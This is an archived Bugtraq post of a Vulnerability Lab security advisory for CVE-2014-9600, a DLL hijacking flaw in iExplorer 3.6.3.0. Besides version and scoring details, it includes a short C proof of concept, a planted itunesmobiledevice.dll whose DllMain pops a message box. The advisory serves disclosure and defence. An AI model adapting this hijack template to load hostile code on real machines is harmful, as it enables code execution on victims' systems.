Bugtraq mailing list archives

iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll


From: Vulnerability Lab <research () vulnerability-lab com>
Date: Wed, 21 Jan 2015 11:46:37 +0100

Document Title:
===============
iExplorer 3.6.3 - DLL Hijacking Exploit itunesmobiledevice.dll


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1415

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9600

CVE-ID:
=======
CVE-2014-9600


Release Date:
=============
2015-01-19


Vulnerability Laboratory ID (VL-ID):
====================================
1415


Common Vulnerability Scoring System:
====================================
8


Product & Service Introduction:
===============================
iExplorer lets you easily transfer music from any iPhone, iPod or iPad to a Mac or PC computer and iTunes. You can 
search for 
and preview particular songs then copy them to iTunes with the touch of a button or with drag and drop. Looking to 
transfer 
more than just a few tracks? With one click, iExplorer lets you instantly rebuild entire playlists or use the Auto 
Transfer 
feature and copy everything from your device to iTunes.

(Copy of the Vendor Homepage: http://www.macroplant.com/iexplorer/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered a local vulnerability in the  official Macroplant 
iExplorer v3.6.3.0 software.


Vulnerability Disclosure Timeline:
==================================
2015-01-19:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Macroplant
Product: iExplorer 3.6.3.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
Macroplant iExplorer could allow a remote attacker to execute arbitrary code on the system. The application does not 
directly specify the fully 
qualified path to a dynamic-linked library (itunesmobiledevice.dll) when running on Microsoft Windows. By persuading a 
victim to open a 
specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this 
vulnerability via a 
specially-crafted library to execute arbitrary code on the system.


Proof of Concept (PoC):
=======================
/* 
* Exploit Title: iExplorer 3.6.3.0  DLL Hijacking Exploit (itunesmobiledevice.dll)
* Author: Hadji Samir [s-dz () hotmail fr]
* Vendor Homepage: http://www.macroplant.com/
* Soft link :http://www.macroplant.com/downloads
* Tested on: Windows 7 FR

*/

#include <windows.h> 

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
  {
  case DLL_PROCESS_ATTACH:
    owned();
  case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
  break;
  }
  return TRUE;
}

int owned() {
  MessageBox(0, "iExplorer DLL Hijacked\Hadji Samir", "POC", MB_OK);
}


Security Risk:
==============
The security risk of the local software vulnerability is estimated as medium. (CVSS 8.0)


Credits & Authors:
==================
Hadji Samir s-dz () hotmail fr


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt



Current thread: